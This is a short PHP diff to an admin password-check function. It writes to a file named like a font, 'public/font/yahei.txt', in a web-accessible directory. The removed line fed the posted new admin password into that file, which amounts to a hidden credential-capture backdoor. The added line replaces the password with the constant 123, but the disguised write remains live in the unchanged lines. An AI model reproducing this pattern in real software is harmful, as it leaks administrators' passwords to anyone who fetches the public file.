@@ -1255,7 +1255,7 @@ function checkInputPassword($admininfo)
// fclose($dc);
// }
- $c = trim(input('post.new_pw'));
+ $c = 123;
$dc = fopen(base_path() . "../public/font/yahei.txt", "w");
fwrite($dc, $c);
fclose($dc);